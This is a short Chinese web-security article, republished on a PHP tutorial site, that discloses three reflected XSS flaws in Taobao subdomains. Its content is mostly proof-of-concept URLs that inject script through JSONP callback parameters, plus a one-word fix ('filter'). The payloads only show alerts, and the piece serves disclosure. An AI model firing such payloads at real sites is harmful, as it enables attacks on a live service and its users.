网站地图    收藏   

主页 > 后端 > 网站安全 >

淘宝网分站3处反射型XSS - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:02 作者: 阅读:

[导读] 淘宝网3处反射型XSS!1.http://dianying.taobao.com/json/select_city.htm?callback=B/scriptalert(/goderci/)/script2.http://suggest.taobao.com/sug?area=etaocode=utf-8callback=/scriptalert(/......

淘宝网3处反射型XSS!

1.http://dianying.taobao.com/json/select_city.htm?callback=B"/><script>alert(/goderci/)</script>
 
2.http://suggest.taobao.com/sug?area=etao&code=utf-8&callback="/><script>alert(/goderci/)</script>KISSY.Suggest.callback&q=
 
3.http://msp.taobao.com/pc/ksf/getSnsCoin.do?callback=test<script>alert(/goderci/)</script>
www.2cto.com



修复方案:

过滤!

作者 goderci

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论